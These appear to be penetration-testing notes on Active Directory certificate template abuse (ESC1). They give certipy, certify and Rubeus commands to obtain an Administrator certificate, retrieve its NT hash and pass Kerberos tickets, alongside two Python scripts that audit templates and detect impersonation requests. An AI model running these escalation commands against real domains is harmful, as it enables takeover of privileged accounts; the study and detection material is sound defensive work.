# Certificate Authority (CA)

## Enumerate CA for vulnerabilities

{% embed url="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" %}

Some certificate templates are misconfigured in ways that let the requester control the identity in the issued certificate (for example by supplying an arbitrary Subject Alternative Name); the HackTricks page linked above catalogues these domain-escalation cases.

```
# Using certutil we can list templates (run on a domain-joined Windows host)
certutil -v -dstemplate

# Using certify.exe (locally)
.\certify.exe find /vulnerable

# Using certipy (remotely, from a Linux host; certipy is installed as a console script)
certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
```

## Exploiting misconfigured templates

Request a certificate from a vulnerable template:

```
# Using certipy (Certipy 4.x syntax; older 2.x releases used the positional form
# certipy req '<domain>/<user>:<password>@<ca_server>' <ca_name> -template '<vulnerable_template_name>' -alt '<target_user>')
certipy req -u '<user>@<domain>' -p '<password>' -target <ca_server> -ca <ca_name> -template '<vulnerable_template_name>' -upn '<target_user>@<domain>'

# Using certify.exe
.\certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable_template_name>" /altname:"<alt_name>"
```
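The two sections above rely on tools reporting which templates are "vulnerable". As an added illustration (not from these notes and not the code of Certify or Certipy), the following Python script expresses the conditions those tools look for when they report an ESC1-style template: the requester may supply the subject/SAN, the EKUs permit domain authentication, no manager approval or authorized signature is required, and low-privileged principals can enroll. The `msPKI-*` attribute names, flag bits and EKU OIDs are the real AD CS schema values; the template dictionaries and the `enroll` list (which stands in for the Enroll ACEs of the template's security descriptor) are constructed sample data for an audit run.

```python
"""Audit certificate template attributes for the ESC1 misconfiguration pattern.

The templates below are constructed sample data, not real directory objects.
"""

# Bit in msPKI-Certificate-Name-Flag: the requester may supply the subject/SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: every request is held for manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let a certificate authenticate a principal to the domain
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals that make enrollment available to effectively every domain account
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Constructed sample templates (hypothetical values, simplified attribute set)
TEMPLATES = [
    {   # subject is built from AD, so the requester cannot choose the identity
        "name": "User",
        "msPKI-Certificate-Name-Flag": 0x0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "enroll": ["Domain Users"],
    },
    {   # requester supplies the subject, but the EKU only allows server auth
        "name": "CustomWebServer",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "enroll": ["Domain Users"],
    },
    {   # every ESC1 precondition at once
        "name": "VulnTemplate",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "enroll": ["Domain Users"],
    },
    {   # same as above but requests wait for a certificate manager
        "name": "ApprovedAuth",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "enroll": ["Domain Users"],
    },
]

ESC1_CONDITION_COUNT = 5


def allows_authentication(ekus):
    """An empty EKU list means any purpose, which includes authentication."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_findings(template):
    """Return the ESC1 preconditions that this template satisfies."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("requester supplies subject/SAN")
    if allows_authentication(template["pKIExtendedKeyUsage"]):
        findings.append("EKU permits domain authentication")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signature required")
    if BROAD_PRINCIPALS & set(template["enroll"]):
        findings.append("low-privileged principals can enroll")
    return findings


def is_esc1(template):
    """A template is ESC1 only when all preconditions hold together."""
    return len(esc1_findings(template)) == ESC1_CONDITION_COUNT


def audit(templates=TEMPLATES):
    """Names of templates that match the full ESC1 pattern."""
    return [t["name"] for t in templates if is_esc1(t)]


if __name__ == "__main__":
    for t in TEMPLATES:
        print(f"{t['name']}: {'ESC1' if is_esc1(t) else 'ok'} - {esc1_findings(t)}")
```

Each finding on its own is normal (the built-in User template legitimately satisfies four of the five); the remediation targets whichever single condition is cheapest to break, typically clearing the enrollee-supplies-subject flag or requiring manager approval on the offending template.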

## PKI admins group

If you are a member of the PKI Admins group, you can create a vulnerable template yourself and use it to impersonate Administrator.

First, create a new template with the PowerShell module <https://github.com/GoateePFE/ADCSTemplate>. The example below clones the built-in "Subordinate Certification Authority" template under the name "Incendium", publishes it on the CA and grants enrollment to the PKI Admins group:

```
Import-Module .\ADCSTemplate.psm1
# Export the built-in template as JSON and create a published copy named "Incendium" that "DOMAIN\PKI Admins" can enroll in
New-ADCSTemplate -DisplayName Incendium -JSON (Export-ADCSTemplate -DisplayName "Subordinate Certification Authority") -Publish -Identity "DOMAIN\PKI Admins"
```

Next, request a certificate from the new template while specifying Administrator as the UPN in the alternative name:

```
certipy req -username incendium@domain.local -password PASS123 -ca domain-DC01-CA -target dc.domain.local -template Incendium -upn Administrator@domain.local -dns domain.local
```

Now the PFX output file can be used to authenticate as Administrator via PKINIT and retrieve the account's NT hash:

```
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.1.10 -username 'Administrator' -domain 'domain.local'
```
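The request in this section issues a certificate that names Administrator in the SAN to an account that is not Administrator, and a certificate is issued for the template created a moment earlier. As an added example that is not part of these notes, the Python below implements the CA-side check that catches this pattern: it reads records of issued certificates and flags every request whose requesting account differs from the UPN carried in the certificate's SAN. The records are constructed here; their column layout is a hypothetical normalisation of a CA database export or of the CA's certificate-issued events, not a format any tool produces verbatim.

```python
"""Flag issued certificates whose SAN UPN names a different account than the requester.

RECORDS is constructed sample data; the column layout is hypothetical.
"""
import csv
import io
from dataclasses import dataclass

# Constructed sample export of issued certificates (hypothetical data).
# Columns: request ID, requesting account, template name, UPN carried in the SAN
RECORDS = """\
RequestID,RequesterName,CertificateTemplate,SanUpn
1042,DOMAIN\\jsmith,User,jsmith@domain.local
1043,DOMAIN\\incendium,Incendium,Administrator@domain.local
1044,DOMAIN\\DC01$,Machine,
1045,DOMAIN\\jsmith,VulnTemplate,svc_backup@domain.local
"""


@dataclass
class Alert:
    request_id: int
    requester: str
    template: str
    san_upn: str


def account_name(principal):
    """Reduce 'DOMAIN\\user' or 'user@domain' to a lower-case bare account name."""
    name = principal.rsplit("\\", 1)[-1]
    return name.split("@", 1)[0].lower()


def find_impersonation_requests(export=RECORDS):
    """Return an Alert for each issued certificate whose SAN UPN is not the requester."""
    alerts = []
    for row in csv.DictReader(io.StringIO(export)):
        san = row["SanUpn"].strip()
        if not san:
            # No UPN in the SAN (machine certificates etc.): nothing to compare
            continue
        if account_name(row["RequesterName"]) != account_name(san):
            alerts.append(Alert(int(row["RequestID"]), row["RequesterName"],
                                row["CertificateTemplate"], san))
    return alerts


if __name__ == "__main__":
    for a in find_impersonation_requests():
        print(f"request {a.request_id}: {a.requester} obtained a certificate "
              f"for {a.san_upn} via template {a.template}")
```

A requester/SAN mismatch is not always malicious (enrollment agents and some service accounts legitimately request on behalf of others), so in practice the check is paired with an allow-list of approved enrollment agents and with alerting on newly published templates, which is the other observable step of this section.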

## Convert PEM to PFX

```
# cert.pem must contain both the certificate and its private key (otherwise add -inkey key.pem);
# -keyex and -CSP mark the key for the Windows CSP so the PFX imports cleanly on Windows
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

## Request ticket

```
# Request the TGT with the certificate and inject it into the current session
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# If "cert.pfx" is password-protected, the password must be supplied
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# Or reference a certificate in the user's certificate store by thumbprint and write the ticket to a file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi
```

## Pass the ticket

```
# Convert the Rubeus .kirbi ticket into the ccache format used by Impacket tools
impacket-ticketConverter ticket.kirbi ticket.ccache
```
